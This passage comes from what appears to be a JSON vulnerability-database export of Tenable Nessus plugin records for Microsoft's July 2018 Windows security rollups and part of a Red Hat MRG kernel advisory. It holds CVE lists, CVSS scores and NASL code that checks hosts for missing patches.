It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. 
(CVE-2018-8206)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. 
An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - An elevation of privilege vulnerability exists when\n Windows fails a check, allowing a sandbox escape. An\n attacker who successfully exploited the vulnerability\n could use the sandbox escape to elevate privileges on an\n affected system. This vulnerability by itself does not\n allow arbitrary code execution. However, the\n vulnerability could allow arbitrary code to run if an\n attacker uses it in combination with another\n vulnerability, such as a remote code execution\n vulnerability or another elevation of privilege\n vulnerability, that can leverage the elevated privileges\n when code execution is attempted. The security update\n addresses the vulnerability by correcting how Windows\n file picker handles paths. 
(CVE-2018-8314)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_JUL_4338815.NASL", "href": "https://www.tenable.com/plugins/nessus/110981", "published": "2018-07-10T00:00:00", "title": "KB4338824: Windows 8.1 and Windows Server 2012 R2 July 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110981);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-0949\",\n \"CVE-2018-8202\",\n \"CVE-2018-8206\",\n \"CVE-2018-8242\",\n \"CVE-2018-8260\",\n \"CVE-2018-8282\",\n \"CVE-2018-8284\",\n \"CVE-2018-8287\",\n \"CVE-2018-8288\",\n \"CVE-2018-8291\",\n \"CVE-2018-8296\",\n \"CVE-2018-8304\",\n \"CVE-2018-8307\",\n \"CVE-2018-8308\",\n \"CVE-2018-8309\",\n \"CVE-2018-8313\",\n \"CVE-2018-8314\",\n \"CVE-2018-8356\"\n );\n script_bugtraq_id(\n 104617,\n 104620,\n 104622,\n 104629,\n 104631,\n 104634,\n 104636,\n 104637,\n 104638,\n 104648,\n 104652,\n 104664,\n 104665,\n 104666,\n 104667,\n 104668,\n 104669,\n 104670\n );\n script_xref(name:\"MSKB\", value:\"4338815\");\n script_xref(name:\"MSKB\", value:\"4338824\");\n script_xref(name:\"MSFT\", value:\"MS18-4338815\");\n script_xref(name:\"MSFT\", value:\"MS18-4338824\");\n\n script_name(english:\"KB4338824: Windows 8.1 and Windows Server 2012 R2 July 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4338824\nor cumulative update 4338815. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. 
An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - An elevation of privilege vulnerability exists when\n Windows fails a check, allowing a sandbox escape. An\n attacker who successfully exploited the vulnerability\n could use the sandbox escape to elevate privileges on an\n affected system. This vulnerability by itself does not\n allow arbitrary code execution. 
However, the\n vulnerability could allow arbitrary code to run if an\n attacker uses it in combination with another\n vulnerability, such as a remote code execution\n vulnerability or another elevation of privilege\n vulnerability, that can leverage the elevated privileges\n when code execution is attempted. The security update\n addresses the vulnerability by correcting how Windows\n file picker handles paths. (CVE-2018-8314)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)\");\n # https://support.microsoft.com/en-us/help/4338815/windows-81-update-kb4338815\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e0106ae8\");\n # https://support.microsoft.com/en-us/help/4338824/windows-81-update-kb4338824\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?be1b803d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4338824 or Cumulative Update KB4338815.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8284\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/10\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-07\";\nkbs = make_list('4338815', '4338824');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"07_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4338815, 4338824])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n 
hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:37:28", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4338823\nor cumulative update 4338818. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. 
An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - An elevation of privilege vulnerability exists when\n Windows fails a check, allowing a sandbox escape. An\n attacker who successfully exploited the vulnerability\n could use the sandbox escape to elevate privileges on an\n affected system. This vulnerability by itself does not\n allow arbitrary code execution. However, the\n vulnerability could allow arbitrary code to run if an\n attacker uses it in combination with another\n vulnerability, such as a remote code execution\n vulnerability or another elevation of privilege\n vulnerability, that can leverage the elevated privileges\n when code execution is attempted. The security update\n addresses the vulnerability by correcting how Windows\n file picker handles paths. (CVE-2018-8314)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. 
An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_JUL_4338818.NASL", "href": "https://www.tenable.com/plugins/nessus/110982", "published": "2018-07-10T00:00:00", "title": "KB4338823: Windows 7 and Windows Server 2008 R2 July 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110982);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-0949\",\n \"CVE-2018-8202\",\n \"CVE-2018-8206\",\n \"CVE-2018-8242\",\n \"CVE-2018-8260\",\n \"CVE-2018-8282\",\n \"CVE-2018-8284\",\n \"CVE-2018-8287\",\n \"CVE-2018-8288\",\n \"CVE-2018-8291\",\n \"CVE-2018-8296\",\n \"CVE-2018-8304\",\n \"CVE-2018-8307\",\n \"CVE-2018-8308\",\n \"CVE-2018-8309\",\n \"CVE-2018-8314\",\n \"CVE-2018-8356\"\n );\n script_bugtraq_id(\n 104617,\n 104620,\n 104622,\n 104629,\n 104631,\n 104634,\n 104636,\n 104637,\n 104638,\n 104648,\n 104652,\n 104664,\n 104665,\n 104666,\n 104667,\n 104668,\n 104669\n );\n script_xref(name:\"MSKB\", value:\"4338823\");\n script_xref(name:\"MSKB\", value:\"4338818\");\n script_xref(name:\"MSFT\", value:\"MS18-4338823\");\n script_xref(name:\"MSFT\", value:\"MS18-4338818\");\n\n script_name(english:\"KB4338823: Windows 7 and Windows Server 2008 R2 July 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote 
Windows host is missing security update 4338823\nor cumulative update 4338818. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. 
An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. 
The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - An elevation of privilege vulnerability exists when\n Windows fails a check, allowing a sandbox escape. An\n attacker who successfully exploited the vulnerability\n could use the sandbox escape to elevate privileges on an\n affected system. This vulnerability by itself does not\n allow arbitrary code execution. However, the\n vulnerability could allow arbitrary code to run if an\n attacker uses it in combination with another\n vulnerability, such as a remote code execution\n vulnerability or another elevation of privilege\n vulnerability, that can leverage the elevated privileges\n when code execution is attempted. The security update\n addresses the vulnerability by correcting how Windows\n file picker handles paths. (CVE-2018-8314)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. 
The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)\");\n # https://support.microsoft.com/en-us/help/4338823/windows-7-update-kb4338823\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?21aadb60\");\n # https://support.microsoft.com/en-us/help/4338818/windows-7-update-kb4338818\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d021f588\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4338823 or Cumulative Update KB4338818.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8284\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-07\";\nkbs = make_list('4338823', '4338818');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"07_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4338823, 4338818])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:20:41", "bulletinFamily": "scanner", "description": "Updated kernel-rt packages that fix several security issues and\nmultiple bugs are now available for Red Hat Enterprise MRG 2.3.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. 
Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* A buffer overflow flaw was found in the way UTF-8 characters were\nconverted to UTF-16 in the utf8s_to_utf16s() function of the Linux\nkernel", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2013-0566.NASL", "href": "https://www.tenable.com/plugins/nessus/76658", "published": "2014-07-22T00:00:00", "title": "RHEL 6 : MRG (RHSA-2013:0566)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0566. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76658);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2019/10/24 15:35:36\");\n\n script_cve_id(\"CVE-2012-2375\", \"CVE-2012-4530\", \"CVE-2013-1772\", \"CVE-2013-1773\");\n script_bugtraq_id(53615, 55878, 58118, 58200);\n script_xref(name:\"RHSA\", value:\"2013:0566\");\n\n script_name(english:\"RHEL 6 : MRG (RHSA-2013:0566)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel-rt packages that fix several security issues and\nmultiple bugs are now available for Red Hat Enterprise MRG 2.3.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. 
